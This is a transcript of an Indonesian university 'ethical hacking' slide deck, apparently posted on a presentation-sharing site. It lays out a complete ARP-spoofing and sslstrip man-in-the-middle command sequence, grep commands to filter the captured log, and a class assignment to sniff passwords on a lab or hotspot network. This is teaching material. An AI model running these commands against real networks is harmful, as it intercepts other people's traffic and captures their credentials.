1 / 8

ETHICAL HACKING SNIFFING SSLTRIP & SELECTION

ETHICAL HACKING SNIFFING SSLTRIP & SELECTION. Suryayusra , M.Kom.,CCNA. PERINTAH SSLTRIP. echo 1 > /proc/sys/net/ipv4/ ip_forward menjadikan komputer sebagai transparent proxy iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

vangie
Download Presentation

ETHICAL HACKING SNIFFING SSLTRIP & SELECTION

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. ETHICAL HACKINGSNIFFING SSLTRIP & SELECTION Suryayusra, M.Kom.,CCNA

  2. PERINTAH SSLTRIP • echo 1 > /proc/sys/net/ipv4/ip_forward • menjadikankomputersebagai transparent proxy • iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 • root@bt:~# sslstrip -w hasil.txt-a -l 10000 (biarkan jalan) • root@bt:~# arpspoof -ieth0 -t 192.168.1.110 192.168.1.1 • root@bt:~# tail –f hasil.txt

  3. SELECTION grep "href=" hasil.txt | cut -d "/" -f3 > out.txtATAUgrep "href=" hasil.txt | cut -d"/" -f3 out.txt | sort -u > final.txt

  4. TUGAS Buat video tutorial SSLTRIP untuk sniffing dan SELECTION untukmenemukan password padajaringanlabor/hotspot. Tugasberkelompok (satukelompok 3 mhs) Upload video ke YUOTUBE dengannamaUniversitasBinaDarma SSLTRIP SNIFFING

More Related